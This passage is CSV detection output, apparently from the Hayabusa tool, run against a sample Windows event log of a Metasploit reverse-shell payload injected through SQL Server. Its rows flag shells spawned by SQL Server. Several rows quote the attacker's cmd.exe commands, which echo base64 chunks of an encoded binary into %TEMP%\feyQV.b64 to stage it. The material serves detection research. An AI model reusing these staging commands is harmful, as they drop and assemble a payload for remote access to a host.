QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8AAAAAAAAAAP////8qt0AAPrdAAKzIAAAAAAAAAAAAAB7LAADIwAAA8McAAAAAAAAAAAAAYs8AAAzAAADkxwAAAAAAAAAAAACWzwAAAMAAAITJAAAAAAAAAAAAAKTPAACgwQAAeMkAAAAAAAAAAAAAxM8AAJTBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIzPAABwzwAAAAAAAFLPAABGzwAAOs8AACrPAAAYzwAACM8AAPLOAADezgAAxs4AALrOAACqzgAAks4AAHrOAABezgAATs4AAEDOAAD6ywAACswAACTMAAA+zAAATMwAAF7MAABqzAAAdMwAAIbMAACazAAAsswAAMDMAADazAAA8swAAAzNAAAmzQAAPs0AAGDNAABozQAAes0AAIrNAACgzQAAsM0AAMDNAADSzQAA4M0AAO7NAAAEzgAAFs4AADTOAAAAAAAAxMkAANjLAADGywAAuMsAAKjLAACYywAAhMsAAHjLAABoywAAWMsAAErLAABCywAAOMsAACrLAAAUywAACssAAADLAAD2ygAA7MoAAODKAADYygAAzsoAAMTKAAC0ygAApMoAAJrKAACSygAAiMoAAH7KAAB0ygAAbMoAAGTKAABcygAAUsoAAEjKAAA+ygAANMoAACrKAAAgygAAFsoAAArKAAACygAA+skAAOrJAADgyQAA1skAAMzJAADsywAA3M8AANDPAAAAAAAAus8AALDPAAAAAAAABwAAgAQAAIAJAACANAAAgA4AAIAMAACAFQAAgBcAAIADAACAEgAAgAoAAICXAACAcwAAgHQAAIBvAACAAAAAABMBX2lvYgAAWAJmcHJpbnRmALcCc3RyY2hyAACOAV9wY3R5cGUAYQBfX21iX2N1cl9tYXgAAEkCZXhpdAAAPQJhdG9pAAAVAV9pc2N0eXBlAACeAnByaW50ZgAArwJzaWduYWwAAJECbWFsbG9jAABAAmNhbGxvYwAATwJmZmx1c2gAAEwCZmNsb3NlAACcAnBlcnJvcgAAVwJmb3BlbgCkAnFzb3J0APEAX2Z0b2wAwQJzdHJuY3B5AMUCc3Ryc3RyAADAAnN0cm5jbXAAXgJmcmVlAADIAF9lcnJubwAAegBfX3BfX3dlbnZpcm9uAG0AX19wX19lbnZpcm9uAACnAnJlYWxsb2MAxAJzdHJzcG4AAJsCbW9kZgAAvAJzdHJlcnJvcgAA4wJ3Y3NjcHkAAOYCd2NzbGVuAACzAF9jbG9zZQAA6AJ3Y3NuY21wAMMCc3RycmNocgBNU1ZDUlQuZGxsAABVAF9fZGxsb25leGl0AIYBX29u>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.047 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.047 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.049 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.320 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.320 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.320 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.322 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.593 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.593 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.593 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.595 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.867 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.867 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.867 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:22.869 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.140 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.140 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.140 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.143 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.414 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command 
Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.414 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.414 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.416 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.687 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.687 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows 
Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.687 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.689 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.962 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlb
md0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.962 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.962 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:23.964 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.236 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.236 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.236 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.238 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.510 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection 
for reverse shell (MSF).evtx +2020-08-01 22:58:24.510 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.510 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.513 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.790 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
ZXF1ZXN0cyAgICAgTnVtYmVyIG9mIHJlcXVlc3RzIHRvIHBlcmZvcm0KAABPcHRpb25zIGFyZToKAAAAVXNhZ2U6ICVzIFtvcHRpb25zXSBbaHR0cDovL11ob3N0bmFtZVs6cG9ydF0vcGF0aAoAADolZABTU0wgbm90IGNvbXBpbGVkIGluOyBubyBodHRwcyBzdXBwb3J0CgAAaHR0cHM6Ly8AAAAAWyVzXQAAAABodHRwOi8vAGFiOiBDb3VsZCBub3QgcmVhZCBQT1NUIGRhdGEgZmlsZTogJXMKAABhYjogQ291bGQgbm90IGFsbG9jYXRlIFBPU1QgZGF0YSBidWZmZXIKAAAAAGFiOiBDb3VsZCBub3Qgc3RhdCBQT1NUIGRhdGEgZmlsZSAoJXMpOiAlcwoAYWI6IENvdWxkIG5vdCBvcGVuIFBPU1QgZGF0YSBmaWxlICglcyk6ICVzCgBhcHJfZ2xvYmFsX3Bvb2wAJWQuJWQlYwAqKioqAAAAACUzZCVjAAAAJTNkIAAAAAAgIC0gAAAAAEtNR1RQRQAAJXM6IGlsbGVnYWwgb3B0aW9uIC0tICVjCgAAACVzOiBvcHRpb24gcmVxdWlyZXMgYW4gYXJndW1lbnQgLS0gJWMKAABDb21tYW5kTGluZVRvQXJndlcAAGFwcl9pbml0aWFsaXplAAAwMTIzNDU2Nzg5LgAwLjAuMC4wAGJvZ3VzICVwAAAAAEk2NGQAAAAATm8gaG9zdCBkYXRhIG9mIHRoYXQgdHlwZSB3YXMgZm91bmQASG9zdCBub3QgZm91bmQAAEdyYWNlZnVsIHNodXRkb3duIGluIHByb2dyZXNzAAAAV1NBU3RhcnR1cCBub3QgeWV0IGNhbGxlZAAAAFdpbnNvY2sgdmVyc2lvbiBvdXQgb2YgcmFuZ2UAAAAATmV0d29yayBzeXN0ZW0gaXMgdW5hdmFpbGFibGUAAABUb28gbWFueSBsZXZlbHMgb2YgcmVtb3RlIGluIHBhdGgAAABTdGFsZSBORlMgZmlsZSBoYW5kbGUAAABEaXNjIHF1b3RhIGV4Y2VlZGVkAFRvbyBtYW55IHVzZXJzAABUb28gbWFueSBwcm9jZXNzZXMAAERpcmVjdG9yeSBub3QgZW1wdHkATm8gcm91dGUgdG8gaG9zdAAAAABIb3N0IGlzIGRvd24AAAAARmlsZSBuYW1lIHRvbyBsb25nAABUb28gbWFueSBsZXZlbHMgb2Ygc3ltYm9saWMgbGlua3MAAABDb25uZWN0aW9uIHJlZnVzZWQAAENvbm5lY3Rpb24gdGltZWQgb3V0AAAAAFRvbyBtYW55IHJlZmVyZW5jZXMsIGNhbid0IHNwbGljZQAAAENhbid0IHNlbmQgYWZ0ZXIgc29ja2V0IHNodXRkb3duAAAAAFNvY2tldCBpcyBub3QgY29ubmVjdGVk>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.790 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.790 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:24.792 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.064 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.064 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.064 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.066 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.338 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.338 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:25.338 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 